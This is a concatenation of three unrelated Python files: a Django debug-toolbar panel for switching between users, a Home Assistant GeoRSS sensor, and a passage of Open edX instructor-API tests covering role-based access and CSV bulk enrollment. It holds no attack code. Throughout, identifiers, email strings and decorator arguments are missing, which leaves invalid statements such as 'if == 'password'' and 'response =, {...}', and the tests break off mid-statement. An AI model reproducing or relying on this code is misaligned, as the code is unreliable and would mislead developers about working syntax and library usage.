""" :mod:`django-debug-toolbar-user-panel` ====================================== Panel for the `Django Debug Toolbar <>`_ to easily and quickly switch between users. * View details on the currently logged in user. * Login as any user from an arbitrary email address, username or user ID. * Easily switch between recently logged in users. .. figure:: screenshot.png :align: center The panel supports ``django.contrib.auth.models.User`` models that have had the `username` field removed. Installation ------------ Add ``debug_toolbar_user_panel`` to your ``INSTALLED_APPS``:: INSTALLED_APPS = ( ... 'debug_toolbar_user_panel', ... ) Add ``debug_toolbar_user_panel.panels.UserPanel`` to ``DEBUG_TOOLBAR_PANELS``:: DEBUG_TOOLBAR_PANELS = ( 'debug_toolbar_user_panel.panels.UserPanel' 'debug_toolbar.panels.version.VersionDebugPanel', 'debug_toolbar.panels.timer.TimerDebugPanel', 'debug_toolbar.panels.settings_vars.SettingsVarsDebugPanel', 'debug_toolbar.panels.headers.HeaderDebugPanel', 'debug_toolbar.panels.request_vars.RequestVarsDebugPanel', 'debug_toolbar.panels.sql.SQLDebugPanel', 'debug_toolbar.panels.template.TemplateDebugPanel', 'debug_toolbar.panels.signals.SignalDebugPanel', 'debug_toolbar.panels.logger.LoggingPanel', ) Links ----- View/download code File a bug """ from django import VERSION from django.conf import settings from django.http import HttpResponseForbidden from django.conf.urls import url from django.template.loader import render_to_string from django.utils.translation import ugettext_lazy as _ from django.contrib.auth import get_user_model from debug_toolbar.panels import DebugPanel from . import views from .forms import UserForm class UserPanel(DebugPanel): """ Panel that allows you to login as other recently-logged in users. """ name = 'User' has_content = True @property def nav_title(self): return _('User') @property def url(self): return '' @property def title(self): return _('User') @property def nav_subtitle(self): return self.is_authenticated(self.request) and self.request.user template = 'debug_toolbar_user_panel/panel.html' @property def content(self): if not getattr(settings, 'DEBUG_TOOLBAR_USER_DEBUG', settings.DEBUG): return HttpResponseForbidden() current = [] if self.is_authenticated(self.request): for field in get_user_model()._meta.fields: if == 'password': continue current.append( (field.attname, getattr(self.request.user, field.attname)) ) return render_to_string(self.template, { 'user': self.request.user, 'form': UserForm(), 'next': self.request.GET.get('next'), 'users': get_user_model().objects.order_by('-last_login')[:10], 'current': current, }) def is_authenticated(self, request): if VERSION >= (1, 10): # Django 1.10 onwards `is_authenticated` is a property return request.user.is_authenticated return request.user.is_authenticated() def process_response(self, request, response): self.request = request @classmethod def get_urls(cls): return ( url(r'^users/login/$', views.login_form, name='debug-userpanel-login-form'), url(r'^users/login/(?P<pk>-?\d+)$', views.login, name='debug-userpanel-login'), url(r'^users/logout$', views.logout, name='debug-userpanel-logout'), )
""" Generic GeoRSS events service. Retrieves current events (typically incidents or alerts) in GeoRSS format, and shows information on events filtered by distance to the HA instance's location and grouped by category. For more details about this platform, please refer to the documentation at """ import logging from datetime import timedelta import voluptuous as vol import homeassistant.helpers.config_validation as cv from homeassistant.components.sensor import PLATFORM_SCHEMA from homeassistant.const import ( CONF_UNIT_OF_MEASUREMENT, CONF_NAME, CONF_LATITUDE, CONF_LONGITUDE, CONF_RADIUS, CONF_URL) from homeassistant.helpers.entity import Entity REQUIREMENTS = ['georss_client==0.5'] _LOGGER = logging.getLogger(__name__) ATTR_CATEGORY = 'category' ATTR_DISTANCE = 'distance' ATTR_TITLE = 'title' CONF_CATEGORIES = 'categories' DEFAULT_ICON = 'mdi:alert' DEFAULT_NAME = "Event Service" DEFAULT_RADIUS_IN_KM = 20.0 DEFAULT_UNIT_OF_MEASUREMENT = 'Events' DOMAIN = 'geo_rss_events' SCAN_INTERVAL = timedelta(minutes=5) PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({ vol.Required(CONF_URL): cv.string, vol.Optional(CONF_LATITUDE): cv.latitude, vol.Optional(CONF_LONGITUDE): cv.longitude, vol.Optional(CONF_RADIUS, default=DEFAULT_RADIUS_IN_KM): vol.Coerce(float), vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string, vol.Optional(CONF_CATEGORIES, default=[]): vol.All(cv.ensure_list, [cv.string]), vol.Optional(CONF_UNIT_OF_MEASUREMENT, default=DEFAULT_UNIT_OF_MEASUREMENT): cv.string, }) def setup_platform(hass, config, add_entities, discovery_info=None): """Set up the GeoRSS component.""" latitude = config.get(CONF_LATITUDE, hass.config.latitude) longitude = config.get(CONF_LONGITUDE, hass.config.longitude) url = config.get(CONF_URL) radius_in_km = config.get(CONF_RADIUS) name = config.get(CONF_NAME) categories = config.get(CONF_CATEGORIES) unit_of_measurement = config.get(CONF_UNIT_OF_MEASUREMENT) _LOGGER.debug("latitude=%s, longitude=%s, url=%s, radius=%s", latitude, longitude, url, radius_in_km) # Create all sensors based on categories. devices = [] if not categories: device = GeoRssServiceSensor((latitude, longitude), url, radius_in_km, None, name, unit_of_measurement) devices.append(device) else: for category in categories: device = GeoRssServiceSensor((latitude, longitude), url, radius_in_km, category, name, unit_of_measurement) devices.append(device) add_entities(devices, True) class GeoRssServiceSensor(Entity): """Representation of a Sensor.""" def __init__(self, coordinates, url, radius, category, service_name, unit_of_measurement): """Initialize the sensor.""" self._category = category self._service_name = service_name self._state = None self._state_attributes = None self._unit_of_measurement = unit_of_measurement from georss_client.generic_feed import GenericFeed self._feed = GenericFeed(coordinates, url, filter_radius=radius, filter_categories=None if not category else [category]) @property def name(self): """Return the name of the sensor.""" return '{} {}'.format(self._service_name, 'Any' if self._category is None else self._category) @property def state(self): """Return the state of the sensor.""" return self._state @property def unit_of_measurement(self): """Return the unit of measurement.""" return self._unit_of_measurement @property def icon(self): """Return the default icon to use in the frontend.""" return DEFAULT_ICON @property def device_state_attributes(self): """Return the state attributes.""" return self._state_attributes def update(self): """Update this sensor from the GeoRSS service.""" import georss_client status, feed_entries = self._feed.update() if status == georss_client.UPDATE_OK: _LOGGER.debug("Adding events to sensor %s: %s", self.entity_id, feed_entries) self._state = len(feed_entries) # And now compute the attributes from the filtered events. matrix = {} for entry in feed_entries: matrix[entry.title] = '{:.0f}km'.format( entry.distance_to_home) self._state_attributes = matrix elif status == georss_client.UPDATE_OK_NO_DATA: _LOGGER.debug("Update successful, but no data received from %s", self._feed) # Don't change the state or state attributes. else: _LOGGER.warning("Update not successful, no data received from %s", self._feed) # If no events were found due to an error then just set state to # zero. self._state = 0 self._state_attributes = {}
""" Unit tests for instructor.api methods. """ import datetime import functools import io import json import random import shutil import tempfile from unittest.mock import Mock, NonCallableMock, patch import ddt import pytest import six from boto.exception import BotoServerError from django.conf import settings from django.contrib.auth.models import User # lint-amnesty, pylint: disable=imported-auth-user from django.core import mail from django.core.files.uploadedfile import SimpleUploadedFile from django.http import HttpRequest, HttpResponse from django.test import RequestFactory, TestCase from django.urls import reverse as django_reverse from django.utils.translation import ugettext as _ from edx_when.api import get_dates_for_course, get_overrides_for_user, set_date_for_block from opaque_keys.edx.keys import CourseKey from opaque_keys.edx.locator import UsageKey from pytz import UTC from testfixtures import LogCapture from common.djangoapps.course_modes.models import CourseMode from common.djangoapps.course_modes.tests.factories import CourseModeFactory from common.djangoapps.student.models import ( ALLOWEDTOENROLL_TO_ENROLLED, ALLOWEDTOENROLL_TO_UNENROLLED, ENROLLED_TO_ENROLLED, ENROLLED_TO_UNENROLLED, UNENROLLED_TO_ALLOWEDTOENROLL, UNENROLLED_TO_ENROLLED, UNENROLLED_TO_UNENROLLED, CourseEnrollment, CourseEnrollmentAllowed, ManualEnrollmentAudit, NonExistentCourseError, get_retired_email_by_email, get_retired_username_by_username ) from common.djangoapps.student.roles import ( CourseBetaTesterRole, CourseDataResearcherRole, CourseFinanceAdminRole, CourseInstructorRole, ) from common.djangoapps.student.tests.factories import CourseEnrollmentFactory, UserFactory # lint-amnesty, pylint: disable=unused-import from lms.djangoapps.bulk_email.models import BulkEmailFlag, CourseEmail, CourseEmailTemplate from lms.djangoapps.certificates.api import generate_user_certificates from lms.djangoapps.certificates.models import CertificateStatuses from lms.djangoapps.certificates.tests.factories import ( GeneratedCertificateFactory ) from lms.djangoapps.courseware.models import StudentModule from lms.djangoapps.courseware.tests.factories import ( BetaTesterFactory, GlobalStaffFactory, InstructorFactory, StaffFactory, ) from lms.djangoapps.courseware.tests.helpers import LoginEnrollmentTestCase from lms.djangoapps.experiments.testutils import override_experiment_waffle_flag from lms.djangoapps.instructor.tests.utils import FakeContentTask, FakeEmail, FakeEmailInfo from lms.djangoapps.instructor.views.api import ( _get_certificate_for_user, _get_student_from_request_data, _split_input_list, common_exceptions_400, generate_unique_password, require_finance_admin ) from lms.djangoapps.instructor_task.api_helper import ( AlreadyRunningError, QueueConnectionError, generate_already_running_error_message ) from lms.djangoapps.program_enrollments.tests.factories import ProgramEnrollmentFactory from openedx.core.djangoapps.course_date_signals.handlers import extract_dates from openedx.core.djangoapps.course_groups.cohorts import set_course_cohorted from openedx.core.djangoapps.django_comment_common.models import FORUM_ROLE_COMMUNITY_TA from openedx.core.djangoapps.django_comment_common.utils import seed_permissions_roles from openedx.core.djangoapps.site_configuration import helpers as configuration_helpers from openedx.core.djangoapps.site_configuration.tests.mixins import SiteMixin from openedx.core.lib.teams_config import TeamsConfig from openedx.core.lib.xblock_utils import grade_histogram from openedx.features.course_experience import RELATIVE_DATES_FLAG from xmodule.fields import Date from xmodule.modulestore import ModuleStoreEnum from xmodule.modulestore.tests.django_utils import ModuleStoreTestCase, SharedModuleStoreTestCase from xmodule.modulestore.tests.factories import CourseFactory, ItemFactory from .test_tools import msk_from_problem_urlname DATE_FIELD = Date() EXPECTED_CSV_HEADER = ( '"code","redeem_code_url","course_id","company_name","created_by","redeemed_by","invoice_id","purchaser",' '"customer_reference_number","internal_reference"' ) # ddt data for test cases involving reports REPORTS_DATA = ( { 'report_type': 'grade', 'instructor_api_endpoint': 'calculate_grades_csv', 'task_api_endpoint': 'lms.djangoapps.instructor_task.api.submit_calculate_grades_csv', 'extra_instructor_api_kwargs': {} }, { 'report_type': 'enrolled learner profile', 'instructor_api_endpoint': 'get_students_features', 'task_api_endpoint': 'lms.djangoapps.instructor_task.api.submit_calculate_students_features_csv', 'extra_instructor_api_kwargs': {'csv': '/csv'} }, { 'report_type': 'enrollment', 'instructor_api_endpoint': 'get_students_who_may_enroll', 'task_api_endpoint': 'lms.djangoapps.instructor_task.api.submit_calculate_may_enroll_csv', 'extra_instructor_api_kwargs': {}, }, { 'report_type': 'proctored exam results', 'instructor_api_endpoint': 'get_proctored_exam_results', 'task_api_endpoint': 'lms.djangoapps.instructor_task.api.submit_proctored_exam_results_report', 'extra_instructor_api_kwargs': {}, }, { 'report_type': 'problem responses', 'instructor_api_endpoint': 'get_problem_responses', 'task_api_endpoint': 'lms.djangoapps.instructor_task.api.submit_calculate_problem_responses_csv', 'extra_instructor_api_kwargs': {}, } ) INSTRUCTOR_GET_ENDPOINTS = { 'get_anon_ids', 'get_issued_certificates', } INSTRUCTOR_POST_ENDPOINTS = { 'add_users_to_cohorts', 'bulk_beta_modify_access', 'calculate_grades_csv', 'change_due_date', 'export_ora2_data', 'export_ora2_submission_files', 'export_ora2_summary', 'get_grading_config', 'get_problem_responses', 'get_proctored_exam_results', 'get_student_enrollment_status', 'get_student_progress_url', 'get_students_features', 'get_students_who_may_enroll', 'list_background_email_tasks', 'list_course_role_members', 'list_email_content', 'list_entrance_exam_instructor_tasks', 'list_forum_members', 'list_instructor_tasks', 'list_report_downloads', 'mark_student_can_skip_entrance_exam', 'modify_access', 'register_and_enroll_students', 'rescore_entrance_exam', 'rescore_problem', 'reset_due_date', 'reset_student_attempts', 'reset_student_attempts_for_entrance_exam', 'show_student_extensions', 'show_unit_extensions', 'send_email', 'students_update_enrollment', 'update_forum_role_membership', 'override_problem_score', } def reverse(endpoint, args=None, kwargs=None, is_dashboard_endpoint=True): """ Simple wrapper of Django's reverse that first ensures that we have declared each endpoint under test. Arguments: args: The args to be passed through to reverse. endpoint: The endpoint to be passed through to reverse. kwargs: The kwargs to be passed through to reverse. is_dashboard_endpoint: True if this is an instructor dashboard endpoint that must be declared in the INSTRUCTOR_GET_ENDPOINTS or INSTRUCTOR_GET_ENDPOINTS sets, or false otherwise. Returns: The return of Django's reverse function """ is_endpoint_declared = endpoint in INSTRUCTOR_GET_ENDPOINTS or endpoint in INSTRUCTOR_POST_ENDPOINTS if is_dashboard_endpoint and is_endpoint_declared is False: # Verify that all endpoints are declared so we can ensure they are # properly validated elsewhere. raise ValueError(f"The endpoint {endpoint} must be declared in ENDPOINTS before use.") return django_reverse(endpoint, args=args, kwargs=kwargs) @common_exceptions_400 def view_success(request): "A dummy view for testing that returns a simple HTTP response" return HttpResponse('success') @common_exceptions_400 def view_user_doesnotexist(request): "A dummy view that raises a User.DoesNotExist exception" raise User.DoesNotExist() @common_exceptions_400 def view_alreadyrunningerror(request): "A dummy view that raises an AlreadyRunningError exception" raise AlreadyRunningError() @common_exceptions_400 def view_alreadyrunningerror_unicode(request): """ A dummy view that raises an AlreadyRunningError exception with unicode message """ raise AlreadyRunningError('Text with unicode chárácters') @common_exceptions_400 def view_queue_connection_error(request): """ A dummy view that raises a QueueConnectionError exception. """ raise QueueConnectionError() @ddt.ddt class TestCommonExceptions400(TestCase): """ Testing the common_exceptions_400 decorator. """ def setUp(self): super().setUp() self.request = Mock(spec=HttpRequest) self.request.META = {} def test_happy_path(self): resp = view_success(self.request) assert resp.status_code == 200 def test_user_doesnotexist(self): self.request.is_ajax.return_value = False resp = view_user_doesnotexist(self.request) self.assertContains(resp, "User does not exist", status_code=400) def test_user_doesnotexist_ajax(self): self.request.is_ajax.return_value = True resp = view_user_doesnotexist(self.request) self.assertContains(resp, "User does not exist", status_code=400), False) def test_alreadyrunningerror(self, is_ajax): self.request.is_ajax.return_value = is_ajax resp = view_alreadyrunningerror(self.request) self.assertContains(resp, "Requested task is already running", status_code=400), False) def test_alreadyrunningerror_with_unicode(self, is_ajax): self.request.is_ajax.return_value = is_ajax resp = view_alreadyrunningerror_unicode(self.request) self.assertContains( resp, 'Text with unicode chárácters', status_code=400, ), False) def test_queue_connection_error(self, is_ajax): """ Tests that QueueConnectionError exception is handled in common_exception_400. """ self.request.is_ajax.return_value = is_ajax resp = view_queue_connection_error(self.request) self.assertContains( resp, 'Error occured. Please try again later', status_code=400, ) @ddt.ddt class TestEndpointHttpMethods(SharedModuleStoreTestCase, LoginEnrollmentTestCase): """ Ensure that users can make GET requests against endpoints that allow GET, and not against those that don't allow GET. """ @classmethod def setUpClass(cls): """ Set up test course. """ super().setUpClass() cls.course = CourseFactory.create() def setUp(self): """ Set up global staff role so authorization will not fail. """ super().setUp() global_user = GlobalStaffFactory() self.client.login(username=global_user.username, password='test')*INSTRUCTOR_POST_ENDPOINTS) def test_endpoints_reject_get(self, data): """ Tests that POST endpoints are rejected with 405 when using GET. """ url = reverse(data, kwargs={'course_id': str(}) response = self.client.get(url) assert response.status_code == 405, \ f'Endpoint {data} returned status code {response.status_code} instead of a 405. It should not allow GET.'*INSTRUCTOR_GET_ENDPOINTS) def test_endpoints_accept_get(self, data): """ Tests that GET endpoints are not rejected with 405 when using GET. """ url = reverse(data, kwargs={'course_id': str(}) response = self.client.get(url) assert response.status_code != 405, \ f"Endpoint {data} returned status code 405 where it shouldn't, since it should allow GET." @patch('lms.djangoapps.bulk_email.models.html_to_text', Mock(return_value='Mocking CourseEmail.text_message', autospec=True)) # lint-amnesty, pylint: disable=line-too-long class TestInstructorAPIDenyLevels(SharedModuleStoreTestCase, LoginEnrollmentTestCase): """ Ensure that users cannot access endpoints they shouldn't be able to. """ @classmethod def setUpClass(cls): super().setUpClass() cls.course = CourseFactory.create() cls.chapter = ItemFactory.create( parent=cls.course, category='chapter', display_name="Chapter", publish_item=True, start=datetime.datetime(2018, 3, 10, tzinfo=UTC), ) cls.sequential = ItemFactory.create( parent=cls.chapter, category='sequential', display_name="Lesson", publish_item=True, start=datetime.datetime(2018, 3, 10, tzinfo=UTC), metadata={'graded': True, 'format': 'Homework'}, ) cls.vertical = ItemFactory.create( parent=cls.sequential, category='vertical', display_name='Subsection', publish_item=True, start=datetime.datetime(2018, 3, 10, tzinfo=UTC), ) cls.problem = ItemFactory.create( category="problem", parent=cls.vertical, display_name="A Problem Block", weight=1, publish_item=True, ) cls.problem_urlname = str(cls.problem.location) BulkEmailFlag.objects.create(enabled=True, require_course_email_auth=False) @classmethod def tearDownClass(cls): super().tearDownClass() BulkEmailFlag.objects.all().delete() def setUp(self): super().setUp() self.user = UserFactory.create() CourseEnrollment.enroll(self.user, _module = StudentModule.objects.create( student=self.user,, module_state_key=self.problem.location, state=json.dumps({'attempts': 10}), ) # Endpoints that only Staff or Instructors can access self.staff_level_endpoints = [ ('students_update_enrollment', {'identifiers': '', 'action': 'enroll'}), ('get_grading_config', {}), ('get_students_features', {}), ('get_student_progress_url', {'unique_student_identifier': self.user.username}), ('update_forum_role_membership', {'unique_student_identifier':, 'rolename': 'Moderator', 'action': 'allow'}), ('list_forum_members', {'rolename': FORUM_ROLE_COMMUNITY_TA}), ('send_email', {'send_to': '["staff"]', 'subject': 'test', 'message': 'asdf'}), ('list_instructor_tasks', {}), ('list_background_email_tasks', {}), ('list_report_downloads', {}), ('calculate_grades_csv', {}), ('get_students_features', {}), ('get_students_who_may_enroll', {}), ('get_proctored_exam_results', {}), ('get_problem_responses', {}), ('export_ora2_data', {}), ('export_ora2_submission_files', {}), ('export_ora2_summary', {}), ('rescore_problem', {'problem_to_reset': self.problem_urlname, 'unique_student_identifier':}), ('override_problem_score', {'problem_to_reset': self.problem_urlname, 'unique_student_identifier':, 'score': 0}), ('reset_student_attempts', {'problem_to_reset': self.problem_urlname, 'unique_student_identifier':}), ( 'reset_student_attempts', { 'problem_to_reset': self.problem_urlname, 'unique_student_identifier':, 'delete_module': True } ), ] # Endpoints that only Instructors can access self.instructor_level_endpoints = [ ('bulk_beta_modify_access', {'identifiers': '', 'action': 'add'}), ('modify_access', {'unique_student_identifier':, 'rolename': 'beta', 'action': 'allow'}), ('list_course_role_members', {'rolename': 'beta'}), ('rescore_problem', {'problem_to_reset': self.problem_urlname, 'all_students': True}), ('reset_student_attempts', {'problem_to_reset': self.problem_urlname, 'all_students': True}), ] def _access_endpoint(self, endpoint, args, status_code, msg): """ Asserts that accessing the given `endpoint` gets a response of `status_code`. endpoint: string, endpoint for instructor dash API args: dict, kwargs for `reverse` call status_code: expected HTTP status code response msg: message to display if assertion fails. """ url = reverse(endpoint, kwargs={'course_id': str(}) if endpoint in INSTRUCTOR_GET_ENDPOINTS: response = self.client.get(url, args) else: response =, args) assert response.status_code == status_code, msg def test_student_level(self): """ Ensure that an enrolled student can't access staff or instructor endpoints. """ self.client.login(username=self.user.username, password='test') for endpoint, args in self.staff_level_endpoints: self._access_endpoint( endpoint, args, 403, "Student should not be allowed to access endpoint " + endpoint ) for endpoint, args in self.instructor_level_endpoints: self._access_endpoint( endpoint, args, 403, "Student should not be allowed to access endpoint " + endpoint ) def _access_problem_responses_endpoint(self, msg): """ Access endpoint for problem responses report, ensuring that UsageKey.from_string returns a problem key that the endpoint can work with. msg: message to display if assertion fails. """ mock_problem_key = NonCallableMock(return_value='') mock_problem_key.course_key = with patch.object(UsageKey, 'from_string') as patched_method: patched_method.return_value = mock_problem_key self._access_endpoint('get_problem_responses', {}, 200, msg) def test_staff_level(self): """ Ensure that a staff member can't access instructor endpoints. """ staff_member = StaffFactory( CourseEnrollment.enroll(staff_member, CourseFinanceAdminRole( CourseDataResearcherRole( self.client.login(username=staff_member.username, password='test') # Try to promote to forums admin - not working # update_forum_role(, staff_member, FORUM_ROLE_ADMINISTRATOR, 'allow') for endpoint, args in self.staff_level_endpoints: expected_status = 200 # TODO: make these work if endpoint in ['update_forum_role_membership', 'list_forum_members']: continue elif endpoint == 'get_problem_responses': self._access_problem_responses_endpoint( "Staff member should be allowed to access endpoint " + endpoint ) continue self._access_endpoint( endpoint, args, expected_status, "Staff member should be allowed to access endpoint " + endpoint ) for endpoint, args in self.instructor_level_endpoints: self._access_endpoint( endpoint, args, 403, "Staff member should not be allowed to access endpoint " + endpoint ) def test_instructor_level(self): """ Ensure that an instructor member can access all endpoints. """ inst = InstructorFactory( CourseEnrollment.enroll(inst, CourseFinanceAdminRole( CourseDataResearcherRole( self.client.login(username=inst.username, password='test') for endpoint, args in self.staff_level_endpoints: expected_status = 200 # TODO: make these work if endpoint in ['update_forum_role_membership']: continue elif endpoint == 'get_problem_responses': self._access_problem_responses_endpoint( "Instructor should be allowed to access endpoint " + endpoint ) continue self._access_endpoint( endpoint, args, expected_status, "Instructor should be allowed to access endpoint " + endpoint ) for endpoint, args in self.instructor_level_endpoints: expected_status = 200 self._access_endpoint( endpoint, args, expected_status, "Instructor should be allowed to access endpoint " + endpoint ) @patch.dict(settings.FEATURES, {'ALLOW_AUTOMATED_SIGNUPS': True}) class TestInstructorAPIBulkAccountCreationAndEnrollment(SharedModuleStoreTestCase, LoginEnrollmentTestCase): """ Test Bulk account creation and enrollment from csv file """ @classmethod def setUpClass(cls): super().setUpClass() cls.course = CourseFactory.create() # Create a course with mode 'audit' cls.audit_course = CourseFactory.create() CourseModeFactory.create(, mode_slug=CourseMode.AUDIT) cls.url = reverse( 'register_and_enroll_students', kwargs={'course_id': str(} ) cls.audit_course_url = reverse( 'register_and_enroll_students', kwargs={'course_id': str(} ) def setUp(self): super().setUp() # Create a course with mode 'honor' and with price self.white_label_course = CourseFactory.create() self.white_label_course_mode = CourseModeFactory.create(, mode_slug=CourseMode.HONOR, min_price=10, suggested_prices='10', ) self.white_label_course_url = reverse( 'register_and_enroll_students', kwargs={'course_id': str(} ) self.request = RequestFactory().request() self.instructor = InstructorFactory( self.audit_course_instructor = InstructorFactory( self.white_label_course_instructor = InstructorFactory( self.client.login(username=self.instructor.username, password='test') self.not_enrolled_student = UserFactory( username='NotEnrolledStudent', email='', first_name='NotEnrolled', last_name='Student' ) @patch('') def test_account_creation_and_enrollment_with_csv(self, info_log): """ Happy path test to create a single new user """ csv_content = b",test_student_1,tester1,USA" uploaded_file = SimpleUploadedFile("temp.csv", csv_content) response =, {'students_list': uploaded_file}) assert response.status_code == 200 data = json.loads(response.content.decode('utf-8')) assert len(data['row_errors']) == 0 assert len(data['warnings']) == 0 assert len(data['general_errors']) == 0 manual_enrollments = ManualEnrollmentAudit.objects.all() assert manual_enrollments.count() == 1 assert manual_enrollments[0].state_transition == UNENROLLED_TO_ENROLLED # test the log for email that's send to new created user. info_log.assert_called_with('email sent to new created user at %s', '') @patch('') def test_account_creation_and_enrollment_with_csv_with_blank_lines(self, info_log): """ Happy path test to create a single new user """ csv_content = b"\,test_student_1,tester1,USA\n\n" uploaded_file = SimpleUploadedFile("temp.csv", csv_content) response =, {'students_list': uploaded_file}) assert response.status_code == 200 data = json.loads(response.content.decode('utf-8')) assert len(data['row_errors']) == 0 assert len(data['warnings']) == 0 assert len(data['general_errors']) == 0 manual_enrollments = ManualEnrollmentAudit.objects.all() assert manual_enrollments.count() == 1 assert manual_enrollments[0].state_transition == UNENROLLED_TO_ENROLLED # test the log for email that's send to new created user. info_log.assert_called_with('email sent to new created user at %s', '') @patch('') def test_email_and_username_already_exist(self, info_log): """ If the email address and username already exists and the user is enrolled in the course, do nothing (including no email gets sent out) """ csv_content = b",test_student_1,tester1,USA\n" \ b",test_student_1,tester2,US" uploaded_file = SimpleUploadedFile("temp.csv", csv_content) response =, {'students_list': uploaded_file}) assert response.status_code == 200 data = json.loads(response.content.decode('utf-8')) assert len(data['row_errors']) == 0 assert len(data['warnings']) == 0 assert len(data['general_errors']) == 0 manual_enrollments = ManualEnrollmentAudit.objects.all() assert manual_enrollments.count() == 1 assert manual_enrollments[0].state_transition == UNENROLLED_TO_ENROLLED # test the log for email that's send to new created user. info_log.assert_called_with( "user already exists with username '%s' and email '%s'", 'test_student_1', '' ) def test_file_upload_type_not_csv(self): """ Try uploading some non-CSV file and verify that it is rejected """ uploaded_file = SimpleUploadedFile("temp.jpg", io.BytesIO(b"some initial binary data: \x00\x01").read()) response =, {'students_list': uploaded_file}) assert response.status_code == 200 data = json.loads(response.content.decode('utf-8')) assert len(data['general_errors']) != 0 assert data['general_errors'][0]['response'] ==\ 'Make sure that the file you upload is in CSV format with no extraneous characters or rows.' manual_enrollments = ManualEnrollmentAudit.objects.all() assert manual_enrollments.count() == 0 def test_bad_file_upload_type(self): """ Try uploading some non-CSV file and verify that it is rejected """ uploaded_file = SimpleUploadedFile("temp.csv", io.BytesIO(b"some initial binary data: \x00\x01").read()) response =, {'students_list': uploaded_file}) assert response.status_code == 200 data = json.loads(response.content.decode('utf-8')) assert len(data['general_errors']) != 0 assert data['general_errors'][0]['response'] == 'Could not read uploaded file.' manual_enrollments = ManualEnrollmentAudit.objects.all() assert manual_enrollments.count() == 0 def test_insufficient_data(self): """ Try uploading a CSV file which does not have the exact four columns of data """ csv_content = b",test_student_1\n" uploaded_file = SimpleUploadedFile("temp.csv", csv_content) response =, {'students_list': uploaded_file}) assert response.status_code == 200 data = json.loads(response.content.decode('utf-8')) assert len(data['row_errors']) == 0 assert len(data['warnings']) == 0 assert len(data['general_errors']) == 1 assert data['general_errors'][0]['response'] ==\ 'Data in row #1 must have exactly four columns: email, username, full name, and country' # lint-amnesty, pylint: disable=line-too-long manual_enrollments = ManualEnrollmentAudit.objects.all() assert manual_enrollments.count() == 0 def test_invalid_email_in_csv(self): """ Test failure case of a poorly formatted email field """ csv_content = b",test_student_1,tester1,USA" uploaded_file = SimpleUploadedFile("temp.csv", csv_content) response =, {'students_list': uploaded_file}) data = json.loads(response.content.decode('utf-8')) assert response.status_code == 200 assert len(data['row_errors']) != 0 assert len(data['warnings']) == 0 assert len(data['general_errors']) == 0 assert data['row_errors'][0]['response'] == 'Invalid email {0}.'.format('') manual_enrollments = ManualEnrollmentAudit.objects.all() assert manual_enrollments.count() == 0 @patch('') def test_csv_user_exist_and_not_enrolled(self, info_log): """ If the email address and username already exists and the user is not enrolled in the course, enrolled him/her and iterate to next one. """ csv_content = b",NotEnrolledStudent,tester1,USA" uploaded_file = SimpleUploadedFile("temp.csv", csv_content) response =, {'students_list': uploaded_file}) assert response.status_code == 200 info_log.assert_called_with( 'user %s enrolled in the course %s', 'NotEnrolledStudent', ) manual_enrollments = ManualEnrollmentAudit.objects.all() assert manual_enrollments.count() == 1 assert manual_enrollments[0].state_transition, UNENROLLED_TO_ENROLLED def test_user_with_already_existing_email_in_csv(self): """ If the email address already exists, but the username is different, assume it is the correct user and just register the user in the course. """ csv_content = b",test_student_1,tester1,USA\n" \ b",test_student_2,tester2,US" uploaded_file = SimpleUploadedFile("temp.csv", csv_content) response =, {'students_list': uploaded_file}) assert response.status_code == 200 data = json.loads(response.content.decode('utf-8')) warning_message = 'An account with email {email} exists but the provided username {username} ' \ 'is different. Enrolling anyway with {email}.'.format(email='', username='test_student_2') # lint-amnesty, pylint: disable=line-too-long assert len(data['warnings']) != 0 assert data['warnings'][0]['response'] == warning_message user = User.objects.get(email='') assert CourseEnrollment.is_enrolled(user, manual_enrollments = ManualEnrollmentAudit.objects.all() assert manual_enrollments.count() == 1 assert manual_enrollments[0].state_transition, UNENROLLED_TO_ENROLLED def test_user_with_retired_email_in_csv(self): """ If the CSV contains email addresses which correspond with users which have already been retired, confirm that the attempt returns invalid email errors. """ # This email address is re-used to create a retired account and another account. conflicting_email = '' # prep a retired user user = UserFactory.create(username='old_test_student', email=conflicting_email) = get_retired_email_by_email( user.username = get_retired_username_by_username(user.username) user.is_active = False csv_content = "{email},{username},tester,USA".format(email=conflicting_email, username='new_test_student') uploaded_file = SimpleUploadedFile("temp.csv", six.b(csv_content)) response =, {'students_list': uploaded_file}) assert response.status_code == 200 data = json.loads(response.content.decode('utf-8')) assert len(data['row_errors']) != 0 assert data['row_errors'][0]['response'] == f'Invalid email {conflicting_email}.' assert not User.objects.filter(email=conflicting_email).exists() def test_user_with_already_existing_username_in_csv(self): """ If the username already exists (but not the email), assume it is a different user and fail to create the new account. """ csv_content = b",test_student_1,tester1,USA\n" \ b",test_student_1,tester2,US" uploaded_file = SimpleUploadedFile("temp.csv", csv_content) response =, {'students_list': uploaded_file}) assert response.status_code == 200 data = json.loads(response.content.decode('utf-8')) assert len(data['row_errors']) != 0 assert data['row_errors'][0]['response'] == 'Username {user} already exists.'.format(user='test_student_1') # lint-amnesty, pylint: disable=line-too-long def test_csv_file_not_attached(self): """ Test when the user does not attach a file """ csv_content = b",test_student_1,tester1,USA\n" \ b",test_student_1,tester2,US" uploaded_file = SimpleUploadedFile("temp.csv", csv_content) response =, {'file_not_found': uploaded_file}) assert response.status_code == 200 data = json.loads(response.content.decode('utf-8')) assert len(data['general_errors']) != 0 assert data['general_errors'][0]['response'] == 'File is not attached.' manual_enrollments = ManualEnrollmentAudit.objects.all() assert manual_enrollments.count() == 0 def test_raising_exception_in_auto_registration_and_enrollment_case(self): """ Test that exceptions are handled well """ csv_content = b",test_student_1,tester1,USA\n" \ b",test_student_1,tester2,US" uploaded_file = SimpleUploadedFile("temp.csv", csv_content) with patch('lms.djangoapps.instructor.views.api.create_manual_course_enrollment') as mock: mock.side_effect = NonExistentCourseError() response =, {'students_list': uploaded_file}) assert response.status_code == 200 data = json.loads(response.content.decode('utf-8')) assert len(data['row_errors']) != 0 assert data['row_errors'][0]['response'] == 'NonExistentCourseError' manual_enrollments = ManualEnrollmentAudit.objects.all() assert manual_enrollments.count() == 0 def test_generate_unique_password(self): """ generate_unique_password should generate a unique password string that excludes certain characters. """ password = generate_unique_password([], 12) assert len(password) == 12 for letter in password: assert letter not in 'aAeEiIoOuU1l' def test_users_created_and_enrolled_successfully_if_others_fail(self): # prep a retired user user = UserFactory.create(username='old_test_student_4', email='') = get_retired_email_by_email( user.username = get_retired_username_by_username(user.username) user.is_active = False csv_content = b",test_student_1,tester1,USA\n" \ b",test_student_1,tester3,CA\n" \ 